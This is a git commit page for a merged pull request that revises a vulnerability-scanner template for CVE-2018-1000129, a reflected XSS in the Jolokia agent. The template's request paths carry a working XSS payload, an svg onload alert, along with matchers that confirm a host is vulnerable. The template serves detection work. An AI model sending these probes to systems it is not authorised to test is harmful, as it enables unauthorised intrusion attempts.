Merge pull request #4412 from daffainfo/patch-26

Update CVE-2018-1000129.yaml
2022-05-17 12:28:40 +05:30 · 2022-05-17 12:28:40 +05:30 · 8e507feb65
parent abb57403f5 deb51c0d22
commit 8e507feb65
1 changed files with 23 additions and 14 deletions
--- a/cves/2018/CVE-2018-1000129.yaml
+++ b/cves/2018/CVE-2018-1000129.yaml
@ -2,14 +2,15 @@ id: CVE-2018-1000129

 info:
  name: Jolokia XSS
-  author: mavericknerd,0h1in9e
+  author: mavericknerd,0h1in9e,daffainfo
  severity: medium
-  description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
+  description: |
+    An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
  reference:
    - https://jolokia.org/#Security_fixes_with_1.5.0
    - https://github.com/rhuss/jolokia/commit/5895d5c137c335e6b473e9dcb9baf748851bbc5f#diff-f19898247eddb55de6400489bff748ad
-    - https://access.redhat.com/errata/RHSA-2018:2669
-    - https://access.redhat.com/errata/RHSA-2018:3817
+    - https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html
+    - https://blog.it-securityguard.com/how-i-made-more-than-30k-with-jolokia-cves/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
@ -20,18 +21,26 @@ info:
 requests:
  - method: GET
    path:
-      - "{{BaseURL}}/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html"
-      - "{{BaseURL}}/api/jolokia/read<svg onload=alert(document.domain)>?mimeType=text/html"
+      - "{{BaseURL}}/api/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"
+      - "{{BaseURL}}/jolokia/read<svg%20onload=alert(document.domain)>?mimeType=text/html"
+
+    stop-at-first-match: true
    matchers-condition: and
    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "<svg onload=alert(document.domain)>"
+          - "java.lang.IllegalArgumentException"
+          - "No type with name"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
      - type: status
        status:
          - 200
-      - type: word
-        words:
-          - "<svg onload=alert(document.domain)>"
-        part: body
-      - type: word
-        words:
-          - "text/html"
-        part: header